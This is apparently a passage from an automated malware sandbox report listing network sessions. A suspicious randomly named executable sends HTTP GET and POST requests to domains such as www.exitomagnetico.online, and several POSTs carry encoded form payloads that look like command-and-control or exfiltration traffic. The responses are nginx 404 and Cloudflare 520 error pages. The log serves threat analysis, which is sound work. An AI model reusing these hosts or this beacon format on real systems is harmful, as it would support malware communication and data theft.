57 4c 43 54 36 73 38 38 67 67 6a [TRUNCATED]
                                                                Data Ascii: pFYX4n=orak10WSoIiUjzyNTDVRnkUtbjiQxTq55wOLnoAhbaQGWrS74VXvNqnXNcT6Ac5QbnEWA0cVr7suLtZtofUxKksDH7IQF59wDaNsKhS8vsfcIdmnICV3Ej8rfXDRkC28JfIe0Bvw2+H52JRIc4ewC4BZlUlIp6c3/bM+vi6H6OWXMISp4ugGYx20aEj84tzqY9k111wxukIi4EPk7rBg+oXdSz+yhBOlQkcXlgdCkHYgXgdwDBE1i+aD6JCwPtqUzorKemTfxdSQXMUGZRYefCkTYx8tzCSheKg8bfnVdvNXTf6QEqfml62nOE+oz1hcWLCT6s88ggjY7WfQ5M3IJa28FEGv86Cq6lv/lhqwn98qaBpM7QiIim5244wSYnLAYfShpOMZ7OqVVEUrrcagddYKhSkKzrNeMWLGGhEIsIIDjPyO5AyiJRhkfnc5W+ChpaFYGS0ZQMWyZm22hSXcwK/jLk7kpmdA/Mc5xAD+xTgxgOEygLFjJXi1EIhFnxivDkMvhiL41fJ+awdKhrhTSc894BbUHNRUlrYhKWcCVDwkz6fHVMS3x9cd8HvAamP9COkdeIqNy5mtBwMgCHg4+9lH2tvSbbLVP8D5d4mZ/aBuh1Fzx5r8L6vZBd4dy7LDBCuqs4uW3Wj7qsaOKuoI6OHPPIqajY/dUgaCQ82TdeZBJPexFBbBUAe8dAlzuAxqeLlNiX59BRw14Vs+G3rjf0tyxlaLhlTIBNaWrleb5jI2oozGjUEg4tU+ka6D4zQCtOXX8ssRQ+ExfT/u6aMX134Y6e4QOU048dwJygrGA3JWijcXql5nkxv/M1y+XJ8QxAQYwrv+01atqRQo+23ialQQaLbEi3MqQhhGiEWiEdbOfSFP5VIgCmLLS745Kk4DDlayhxDlYSO7p3BrXxLkUou65sCrGmCOWVMSiZMlyscU7xh/FBNFtw+cGUn9hYtHBPfdxHmOEXljr/Ms1roFVm+FUmk4LfxvFXwRyU6A3zwwp [TRUNCATED]
                                                                Dec 10, 2024 12:18:52.058157921 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:51 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.44989435.220.176.144804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:18:53.240180016 CET457OUTGET /z7sc/?pFYX4n=lpyE2AbPqI/20nbLdgQLpDIVfBauxh+/nj7uqY0yeMpYT6Ph3E36c6D0EpnRPNVSfUYtH00jj9MWE9I4iZUmSEZjfY8EepRiDIFeNjKsgcauBuStZyRsOkE=&rr7x1=pT0pWliPV HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.5
                                                                Connection: close
                                                                Host: www.bienmaigrir.info
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Dec 10, 2024 12:18:54.724796057 CET289INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Tue, 10 Dec 2024 11:18:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 146
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.449910172.67.182.171804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:00.309736013 CET744OUTPOST /983l/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 203
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.exitomagnetico.online
                                                                Origin: http://www.exitomagnetico.online
                                                                Referer: http://www.exitomagnetico.online/983l/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 74 2b 2b 72 51 6f 42 55 72 79 57 38 44 76 49 41 37 37 75 61 63 68 51 62 4f 4b 61 65 32 54 6f 65 6d 51 44 6b 61 79 38 36 4e 69 62 67 54 74 52 77 53 32 54 4d 54 42 6e 41 76 34 6d 4e 61 48 31 33 79 67 34 55 43 36 4f 4b 6a 62 77 56 78 43 7a 48 79 6f 6d 75 49 32 52 59 55 4b 77 44 31 66 7a 79 37 51 53 52 6c 41 4b 7a 64 4a 5a 77 2f 42 4f 48 41 55 39 37 67 78 44 69 43 36 58 77 46 78 58 6e 61 54 4e 53 4e 33 6e 4d 6d 4f 46 71 4d 42 73 5a 75 71 4d 2b 4a 66 74 66 5a 6f 62 66 52 36 4f 52 31 31 75 6b 6b 74 55 67 37 44 6b 6e 46 7a 34 4c 31 38 58 46 54 35 6b 37 74 65 71 41 64 34 48 53 6a 51 3d 3d
                                                                Data Ascii: pFYX4n=t++rQoBUryW8DvIA77uachQbOKae2ToemQDkay86NibgTtRwS2TMTBnAv4mNaH13yg4UC6OKjbwVxCzHyomuI2RYUKwD1fzy7QSRlAKzdJZw/BOHAU97gxDiC6XwFxXnaTNSN3nMmOFqMBsZuqM+JftfZobfR6OR11ukktUg7DknFz4L18XFT5k7teqAd4HSjQ==
                                                                Dec 10, 2024 12:19:01.520039082 CET1236INHTTP/1.1 520
                                                                Date: Tue, 10 Dec 2024 11:19:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 7241
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arlzqfJ6UOJ0wySPdIdIkVZeidpahaIbLVwCmC6%2BGOGY6Zde9Ej1Xvlp7b7sPVJZUOIW0j1fqIriss6322oeZtnmiEpCK%2BrW8SUpBP8E8cBQBaga2%2FuOLUpsh6cq1%2FPA8Rz3nBLbB7EOMuUq"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8efcd6686ca343f1-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1561&min_rtt=1561&rtt_var=780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=744&delivery_rate=0&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20
                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js"
                                                                Dec 10, 2024 12:19:01.520138025 CET1236INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 20 7c 20 35 32 30 3a 20 57 65
                                                                Data Ascii: lang="en-US"> ...<![endif]--><head><title>www.exitomagnetico.online | 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X
                                                                Dec 10, 2024 12:19:01.520144939 CET1236INData Raw: 55 54 43 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                Data Ascii: UTC</div> </header> <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w
                                                                Dec 10, 2024 12:19:01.520421982 CET1236INData Raw: 30 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72
                                                                Data Ascii: 0&utm_campaign=www.exitomagnetico.online" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:ri
                                                                Dec 10, 2024 12:19:01.520428896 CET1236INData Raw: 75 6e 63 61 74 65 22 3e 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 3c 2f 73 70 61 6e 3e 0a 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 6d 64 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 6d 74 2d 33 20 6d 64 3a 6d 74 2d 30
                                                                Data Ascii: uncate">www.exitomagnetico.online</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div>
                                                                Dec 10, 2024 12:19:01.520441055 CET1236INData Raw: 75 72 20 6f 72 69 67 69 6e 20 77 65 62 20 73 65 72 76 65 72 2e 20 43 6c 6f 75 64 66 6c 61 72 65 20 6d 6f 6e 69 74 6f 72 73 20 66 6f 72 20 74 68 65 73 65 20 65 72 72 6f 72 73 20 61 6e 64 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 69 6e 76 65 73
                                                                Data Ascii: ur origin web server. Cloudflare monitors for these errors and automatically investigates the cause. To help support the investigation, you can pull the corresponding error log from your web server and submit it our support team. Please inclu
                                                                Dec 10, 2024 12:19:01.520447016 CET777INData Raw: 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61
                                                                Data Ascii: </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_520&utm_campaign=www.exitomagnetico.o


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.449916172.67.182.171804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:02.989814043 CET764OUTPOST /983l/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 223
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.exitomagnetico.online
                                                                Origin: http://www.exitomagnetico.online
                                                                Referer: http://www.exitomagnetico.online/983l/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 74 2b 2b 72 51 6f 42 55 72 79 57 38 5a 50 34 41 35 63 43 61 5a 42 51 63 43 71 61 65 2f 7a 6f 53 6d 51 66 6b 61 77 52 2f 4f 52 76 67 51 50 5a 77 54 33 54 4d 51 42 6e 41 6b 59 6d 49 48 58 31 70 79 67 38 79 43 37 79 4b 6a 62 6b 56 78 47 2f 48 79 35 6d 70 4b 6d 52 61 63 71 77 42 36 2f 7a 79 37 51 53 52 6c 41 66 37 64 4a 68 77 38 77 2b 48 42 33 6c 34 37 52 44 68 53 71 58 77 50 52 58 72 61 54 4e 67 4e 79 62 69 6d 4d 74 71 4d 44 30 5a 67 65 51 39 48 66 73 61 57 49 61 37 63 50 54 41 38 33 50 4b 6b 4f 4d 46 30 44 67 52 4e 56 31 52 6b 4e 32 53 42 35 41 49 77 5a 6a 30 51 37 36 62 34 59 4a 76 53 51 34 5a 58 4c 30 42 52 44 32 69 31 33 35 2b 48 34 4d 3d
                                                                Data Ascii: pFYX4n=t++rQoBUryW8ZP4A5cCaZBQcCqae/zoSmQfkawR/ORvgQPZwT3TMQBnAkYmIHX1pyg8yC7yKjbkVxG/Hy5mpKmRacqwB6/zy7QSRlAf7dJhw8w+HB3l47RDhSqXwPRXraTNgNybimMtqMD0ZgeQ9HfsaWIa7cPTA83PKkOMF0DgRNV1RkN2SB5AIwZj0Q76b4YJvSQ4ZXL0BRD2i135+H4M=
                                                                Dec 10, 2024 12:19:04.245686054 CET1236INHTTP/1.1 520
                                                                Date: Tue, 10 Dec 2024 11:19:04 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 7241
                                                                Connection: close
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x3Jic7MCvYHmSRfzM1FuE9AUu%2Fqge%2BShd7Clp4QK1fTIVZtHj4PvruEY86lSVALmDt5dJyIaoi7dUppmuyDTJhhNOn0G%2BDpHJnbgo7dBu3582wRBtxmHk7%2Fhz92OhwRHq6SU%2BmQ82UpOJCuN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                X-Frame-Options: SAMEORIGIN
                                                                Referrer-Policy: same-origin
                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                Server: cloudflare
                                                                CF-RAY: 8efcd6794b5d8c05-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1860&min_rtt=1860&rtt_var=930&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=764&delivery_rate=0&cwnd=213&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73
                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js
                                                                Dec 10, 2024 12:19:04.245747089 CET1236INData Raw: 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 20 7c 20 35 32 30 3a 20
                                                                Data Ascii: " lang="en-US"> ...<![endif]--><head><title>www.exitomagnetico.online | 520: Web server is returning an unknown error</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv=
                                                                Dec 10, 2024 12:19:04.245758057 CET1236INData Raw: 34 20 55 54 43 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 79 2d 38 20 62 67 2d 67 72 61 64 69 65 6e 74 2d 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: 4 UTC</div> </header> <div class="my-8 bg-gradient-gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md
                                                                Dec 10, 2024 12:19:04.246119022 CET672INData Raw: 35 32 30 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 77 77 2e 65 78 69 74 6f 6d 61 67 6e 65 74 69 63 6f 2e 6f 6e 6c 69 6e 65 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72
                                                                Data Ascii: 520&utm_campaign=www.exitomagnetico.online" target="_blank" rel="noopener noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:
                                                                Dec 10, 2024 12:19:04.246129990 CET1236INData Raw: 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 65 65 6e 2d 73 75 63 63 65 73 73 22 3e 57 6f 72 6b 69 6e 67 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 66 2d 68 6f 73 74 2d 73 74 61 74 75 73 22 20 63 6c 61 73
                                                                Data Ascii: text-2xl text-green-success">Working</span></div><div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-le
                                                                Dec 10, 2024 12:19:04.246141911 CET1236INData Raw: 65 72 2e 20 41 73 20 61 20 72 65 73 75 6c 74 2c 20 74 68 65 20 77 65 62 20 70 61 67 65 20 63 61 6e 20 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20
                                                                Data Ascii: er. As a result, the web page can not be displayed.</p> </div> <div class="w-1/2 md:w-full float-left leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
                                                                Dec 10, 2024 12:19:04.246151924 CET1236INData Raw: 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d
                                                                Data Ascii: der-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8efcd6794b5d8c05</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id
                                                                Dec 10, 2024 12:19:04.246162891 CET107INData Raw: 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 64 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76
                                                                Data Ascii: ener("DOMContentLoaded",d)})();</script></div>... /.error-footer --> </div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.449923172.67.182.171804944C:\Program Files (x86)\TlTKtUFrtIKUBNrdFQPDBezKLCajrPELiIfFLOLnpkcodTrVQRpXLQkVDwhp\mGAzNmDsKUvf.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 10, 2024 12:19:05.654359102 CET10846OUTPOST /983l/ HTTP/1.1
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.5
                                                                Cache-Control: no-cache
                                                                Content-Length: 10303
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: www.exitomagnetico.online
                                                                Origin: http://www.exitomagnetico.online
                                                                Referer: http://www.exitomagnetico.online/983l/
                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 IT/1.1.20.1 Firefox/2.0.0.2 (.NET CLR 3.5.30729)
                                                                Data Raw: 70 46 59 58 34 6e 3d 74 2b 2b 72 51 6f 42 55 72 79 57 38 5a 50 34 41 35 63 43 61 5a 42 51 63 43 71 61 65 2f 7a 6f 53 6d 51 66 6b 61 77 52 2f 4f 51 58 67 54 39 68 77 53 55 37 4d 66 68 6e 41 36 6f 6d 4a 48 58 30 73 79 67 45 75 43 37 2b 77 6a 64 67 56 77 6c 33 48 6a 37 65 70 44 6d 52 61 51 4b 77 43 31 66 7a 6a 37 51 6a 35 6c 41 50 37 64 4a 68 77 38 79 6d 48 56 55 39 34 38 68 44 69 43 36 58 43 46 78 58 48 61 54 46 61 4e 7a 76 63 6c 39 4e 71 50 6a 6b 5a 73 4c 4d 39 50 66 73 55 54 49 61 6a 63 50 57 59 38 33 6a 73 6b 4e 51 37 30 42 38 52 4f 56 34 67 2b 4f 36 39 61 61 55 4f 67 59 36 54 5a 4b 61 70 34 76 55 62 42 56 34 51 4c 34 77 36 55 42 6a 72 76 58 39 59 59 2f 65 7a 67 69 4f 65 32 37 4d 72 65 69 4d 2b 56 51 61 4b 6c 55 46 62 34 4d 6b 56 54 75 44 7a 75 39 56 4a 62 4e 51 48 79 47 66 48 43 41 42 4d 72 37 6b 47 59 56 43 33 4a 63 78 2f 4b 4d 64 6a 66 71 64 55 35 4e 4a 32 76 69 6d 66 70 32 4d 33 76 67 67 64 42 4b 39 54 2b 4c 76 43 41 51 69 37 42 4c 74 31 53 48 4e 51 4b 71 52 6a 4c 43 4c 56 78 33 79 46 59 44 54 [TRUNCATED]
                                                                Data Ascii: pFYX4n=t++rQoBUryW8ZP4A5cCaZBQcCqae/zoSmQfkawR/OQXgT9hwSU7MfhnA6omJHX0sygEuC7+wjdgVwl3Hj7epDmRaQKwC1fzj7Qj5lAP7dJhw8ymHVU948hDiC6XCFxXHaTFaNzvcl9NqPjkZsLM9PfsUTIajcPWY83jskNQ70B8ROV4g+O69aaUOgY6TZKap4vUbBV4QL4w6UBjrvX9YY/ezgiOe27MreiM+VQaKlUFb4MkVTuDzu9VJbNQHyGfHCABMr7kGYVC3Jcx/KMdjfqdU5NJ2vimfp2M3vggdBK9T+LvCAQi7BLt1SHNQKqRjLCLVx3yFYDT18hl3lEOpDoUP/h5JgJ1z8JnsMJ/Qu4CXM6QxVWayb4VxVJ3R2TOSBoJubT6jbpxX9KWxlQgQ4OAXTjnSwtwrcx2HLF56ywrS4NYgGagR4ZhbUYMR30nFMC6Cc1AZolVejwuPsg/HqB1EfD1eVCy1KUu9QfRU4sxLITdQmQ0wOp+8uoccsXR2pWfiablfxMAgpZuOUOYxp77W0fqNN6Bnd2Ei9mkw03p42Wi1A/BASsN1wpQrfT7bU9m4qKmgkIvbXyWipXBo0ihuoTYSDei8H7ypRBLVN1ccMFPoXgWm9pVFCh6426bRZbJ5FZ3rBMXYNR4sX8QQiUXm/nUERsQKi88K1oKqUZ2YAt5o18bQ/loWpbvD8EV6zSWOIrTKG0gZfmNJlr57SoAm3Q7s9hAyJ/qBdrd/d/wOP2P5EqBYLyAqSp5V0STe1DuOKdwlbL9EIK0KsX60A01iwzzTsRV1AKr9vNb6bightRcpXzFRwybsnFy/osvcpbvTB78G//mRl/kwqOb5tBZCucrU0sO0n+4oFzxApGBnSndD2UcTSLkucDsmiatN/Pw5N0R8q6+SmZ+SgsCX/24RUktgIg1qRXwWYFXPbKSICkuJRfUnvAXxYPx0E8CW69wPZ4V5qCdUjb2Rqilz0VQIXbfi+Fy4+HfNdR0/EENAX [TRUNCATED]
                                                                Dec 10, 2024 12:19:06.919193029 CET1236INHTTP/1.1 520
                                                                Date: Tue, 10 Dec 2024 11:19:06 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 7241
